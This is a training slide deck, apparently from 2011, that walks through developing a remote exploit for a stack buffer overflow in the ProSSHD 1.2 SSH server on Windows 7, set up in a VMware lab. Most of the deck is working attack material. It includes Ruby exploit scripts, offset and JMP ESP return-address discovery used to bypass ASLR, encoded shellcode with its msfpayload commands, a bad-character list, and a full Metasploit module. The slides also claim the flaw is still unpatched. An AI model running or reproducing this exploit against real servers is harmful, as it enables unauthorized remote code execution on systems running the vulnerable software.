2011-03 Developing Windows Exploits

1

Real Windows Exploits

Allen Harper

2

ProSSHD Vulnerability

Binary can be found at: http://www.exploit-db.com/application/11618 STILL NOT FIXED…0-days still work…

3

Install ProSSHD in vmware •  Set up W7 vmware client, host only mode. •  Determine vmware client IP. •  Ping vmware client from host system. •  Install Demo ProSSHD inside vm, run it.

Exploit Development Process •  Crash Program in Debugger •  Control EIP (next instruction) •  Determine Offset of Overwrite to EIP •  Determine Opcode to return to (new EIP) •  Determine Space Constraints •  Select and Test Shellcode •  Build Exploit Sandwich •  Determine Bad Characters

4

Immunity Debugger •  Fork from OllyDbg •  Still looks and feels like OllyDbg •  Adds a Python Command Shell •  Allows for more automation •  pvefindaddr is a great plugin tool for

exploit development! http://corelan.be •  Note: there was a problem with 1.74 •  Current version is 1.80

5

6

Save Snapshot, Attach Debugger •  In Vmware, save snapshot (prior to sending) •  Send Exploit, with Sleep(15) before send •  File->Attach->wsshd.exe (may need to sort) •  In debugger, hit F9 to continue process

7

Crash the ProSSHD Server •  From host, crash remote server, control EIP

#prosshd1.rb %w{rubygems net/ssh net/scp}.each { |x| require x } username = 'test1' #need to set this up on the test victim (os account) password = 'test1' #need to set this up on the test victim machine host = '10.10.10.143’ port = 22 # use A's to overwrite eip get_request = "\x41" * 516 # lets do it… Net::SSH.start( host, username, :password => password) do|ssh| sleep(15) # gives us time to attach to wsshd.exe ssh.scp.download!( get_request, "foo.txt”)# 2 params:remote,local file end

• Run exploit with “ruby prosshd1.rb” • Attach debugger to wsshd.exe, after it loads, Hit F9 twice

8

Determine the Offset(s) •  Revert VM, then use Pattern_Create #prosshd2.rb %w{rubygems net/ssh net/scp}.each { |x| require x } username = 'test1' #need to set this up on the test victim (os account) password = 'test1' #need to set this up on the test victim machine host = '10.10.10.143’ port = 22 # use A's to overwrite eip get_request= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq" # lets do it… Net::SSH.start( host, username, :password => password) do|ssh| sleep(15) # gives us time to attach to wsshd.exe ssh.scp.download!( get_request, "foo.txt”)# 2 params:remote,local file end

Run exploit with “ruby prosshd2.rb”

9

Determine the Offset(s) •  Attach Debugger to wsshd.exe •  After it loads, hit F9 twice

10

Determine the Offset(s)

11

Determine Op-Codes to Return to •  Determine the Control Vector, we could:

– JMP ESP – RETN

•  We choose JMP ESP •  Could use msfpescan on ntdll.dll

12

Determine Op-Codes to Return to •  Problem: Vista and beyond protect

NTDLL.DLL with ASLR •  Need to find a non-ASLR module •  This is the best way to “bypass” ASLR •  pvefindaddr is the tool of choice •  Run with “!pvefindaddr j –r esp -n” in

ImmDbg •  Results in file j.txt: •  C:\Users\[your name here]\AppData\Local\VirtualStore\Program Files

\Immunity Inc\Immunity Debugger !

Determine Op-Code Address

13

==================================================================!pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800!-----Loaded modules ---------------------------------------------- !

Fixup | Base | Top | Size | SafeSEH | ASLR |NXCompat | Modulename & Path!

----------------------------------------------------------------!NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO

|MSVCR71.dll:C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll!yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes

| kernel32.dll : C:\Windows\system32\kernel32.dll!yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes

| ntdll.dll : C:\Windows\SYSTEM32\ntdll.dll !<truncated for brevity>!NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO

| wsshd.exe : C:\Users\Public\Program Files\Lab-NC\ProSSHD\wsshd.exe!<truncated for brevity>!Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable]

{PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - !

C:\Users\Public\Program Files\Lab-NC\ProSSHD\MSVCR71.dll <truncated for brevity>!

14

Find Space Constraints •  Crash with 2000 A’s, calculate depth of

buffer #prosshd3.rb …truncated for brevity…!get_request = "\x41" * 492 + "\x42\x42\x42\x42" + “\x41” * 2000!

•  Run, Attach, Crash, inspect stack for buffer size!

0x0012f758-0x0012ef88= 2000 So we can fit 2000 bytes of ���shellcode into the buffer!

Select and Test Shellcode •  Generate your shellcode (switching to C) $ msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a' -e x86/shikata_ga_nai –t c > sc.txt!!

•  Take that shellcode and copy paste into the following harness

//shellcode.c char shellcode[] = //copy paste from above!"\x31\xc0\x31\... your shellcode goes here";!int main() { !//main function !int *ret; !//ret pointer for saved ret ! ret = (int *)&ret + 2;! //set ret to point to the saved return! (*ret) = (int)shellcode; //change the saved ret to addr of shellcode!

}!

15

16

Select and Test Shellcode

Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable program is not linked with /NXCOMPAT by default.

17

Build Exploit Sandwich # prosshd4.rb %w{rubygems net/ssh net/scp}.each { |x| require x } username = 'test1' password = 'test1’host = '10.10.10.143' port = 22 shell= # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93" + "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f" + "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04" + "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb" + "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e" + "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6" + "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21" + "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11" + "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a" + "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5" + "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21" + "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69" + "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36" + "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5" + "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b" + "\x1b\x35\x1d"; # Overwrite eip with "jmp esp" (0x7c345c30) of msvcr71.dll get_request = "\x41" * 492 + "\x30\x5C\x34\x7C" + "\x90" * 1000 + "\xcc" + shell # lets do it... Net::SSH.start( host, username, :password => password) do|ssh| sleep(15) # gives us time to attach to wsshd.exe ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file end !

18

Test Exploit with Debugger •  Run with “ruby prosshd4.rb” •  Hit F9 twice to hit breakpoint

•  Hit F9 to Continue, if crash, then bad character.

19

Find Bad Characters •  Revert VM, resend exploit, step through •  Tip 1: right click on halted instruction, follow in dump…

Shellcode is mangled…why? bad char \x0a

20

Build new Shellcode # msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x20' -e x86/

shikata_ga_nai -t ruby!# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) !

shell = !"\x33\xc9\xb1\x33\xbd\xe3\x34\x37\xfb\xdb\xc6\xd9\x74\x24" +!"\xf4\x5f\x31\x6f\x0f\x83\xef\xfc\x03\x6f\xe8\xd6\xc2\x07" +!"\x06\x9f\x2d\xf8\xd6\xc0\xa4\x1d\xe7\xd2\xd3\x56\x55\xe3" +!

"\x90\x3b\x55\x88\xf5\xaf\xee\xfc\xd1\xc0\x47\x4a\x04\xee" +!"\x58\x7a\x88\xbc\x9a\x1c\x74\xbf\xce\xfe\x45\x70\x03\xfe" +!"\x82\x6d\xeb\x52\x5a\xf9\x59\x43\xef\xbf\x61\x62\x3f\xb4" +!

"\xd9\x1c\x3a\x0b\xad\x96\x45\x5c\x1d\xac\x0e\x44\x16\xea” + !"\xae\x75\xfb\xe8\x93\x3c\x70\xda\x60\xbf\x50\x12\x88\xf1" +!"\x9c\xf9\xb7\x3d\x11\x03\xff\xfa\xc9\x76\x0b\xf9\x74\x81" +!"\xc8\x83\xa2\x04\xcd\x24\x21\xbe\x35\xd4\xe6\x59\xbd\xda" +!

"\x43\x2d\x99\xfe\x52\xe2\x91\xfb\xdf\x05\x76\x8a\x9b\x21" +!"\x52\xd6\x78\x4b\xc3\xb2\x2f\x74\x13\x1a\x90\xd0\x5f\x89" +!"\xc5\x63\x02\xc4\x18\xe1\x38\xa1\x1a\xf9\x42\x82\x72\xc8" +!"\xc9\x4d\x05\xd5\x1b\x2a\xf9\x9f\x06\x1b\x91\x79\xd3\x19" +!

"\xfc\x79\x09\x5d\xf8\xf9\xb8\x1e\xff\xe2\xc8\x1b\x44\xa5" +!"\x21\x56\xd5\x40\x46\xc5\xd6\x40\x25\x88\x44\x08\x84\x2f" +!"\xec\xab\xd8\xa5"

Good list of bad chars: 00 0a 09 20 21

Metasploit Decoders •  Require space on the stack to decode •  Modules use stackadjustment parameter •  You may want to add 16 bytes of NOP to

beginning of payload to be safe.

21

22

Success! •  Revert VM to running state •  Launch Exploit with new shellcode •  Remove \xcc, replace with \x90, fire off exploit •  P0wn3d!!!!! Where do you want to go today!

23

Automating •  Metasploit as you have seen is an

excellent tool for both exploit development and execution.

•  You should look at existing modules, best way to learn techniques.

•  There is no ProSSHD module L •  We will create one and automate our

attack!

24

Metasploit Module Sections •  Header •  Initialize Section ( bad chars, targets) •  Exploit Section (guts of sploit, protocol)

Header ##!# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!##!!

##!# This file is part of the Metasploit Framework and may be subject to!# redistribution and commercial restrictions. Please see the Metasploit!

# Framework web site for more information on licensing and terms of use.!# http://metasploit.com/framework/!##!!

require 'msf/core'!%w{rubygems net/ssh net/scp}.each { |x| require x }!!

class Metasploit3 < Msf::Exploit::Remote!!Rank = AverageRanking!

!!include Msf::Exploit::Remote::Tcp!

25

26

Initialize Section !def initialize(info = {})!! !super(update_info(info,!! !'Name' => 'ProSSHD 1.2.x SCP-GET Buffer Overflow',!! !'Description' => %q{!! !This module exploits a simple stack buffer overflow in ProSSHD 1.2.!! !This flaw is due to a buffer overflow error when handling a specially!! !crafted scp get request from an SSH client.!! !**Based on original Exploit by S2 Crew [Hungary]!! !},!! !'Author' => 'AAH',!! !'License' => MSF_LICENSE,!! !'Version' => '$Revision: 10000 $',!! !'References' => [],!! !'DefaultOptions' => {'EXITFUNC' => 'process’,},!! !'Payload' => {'Space' => 1000,!! ! ! 'BadChars' => "\x00\x09\x0a\x20\x21",!! ! ! 'StackAdjustment' => -3500,},!! !'Platform' => 'win',!! !'Targets' => [[ 'Windows 7', { 'Ret' => 0x7c345c30 } ],],!! !'Privileged' => true,!! !'DisclosureDate' => 'March 3, 2010',!! !'DefaultTarget' => 0))!! !register_options([ !

OptString.new('USERNAME', [ true, 'The username to authenticate as' ]), !! OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),!! ! Opt::RPORT(22)], self.class)!!end!

!

27

Exploit Section def exploit!

! !!!!

get_request = "\x41" * 492 + ! [target.ret].pack(‘V’) + ! "\x90" * 1000 +!

!payload.encoded # shellcode 8)!! !! !print_status("Trying to connect to #{datastore['RHOST']}...")!! !!! !# lets do it...!! !Net::SSH.start( datastore['RHOST'], datastore['USERNAME'], :password => datastore['PASSWORD']) do|ssh|!! ! #sleep(15) # gives us time to attach to wsshd.exe!! print_status("Sending sploit to #{datastore['RHOST']}...")!! ! ssh.scp.download!( get_request, "foo.txt") # 2 params: remote file, local file!! !end!! !handler!!end!

end!!

28

Setup •  Next, install the following rubygems •  Have to run CygShell as Administrator (on older MSF) •  Right click on it in start menu, select “run as

Administrator”

Runit •  Restart vulnerable server •  Run Metasploit Console

29

Armitage Demo

30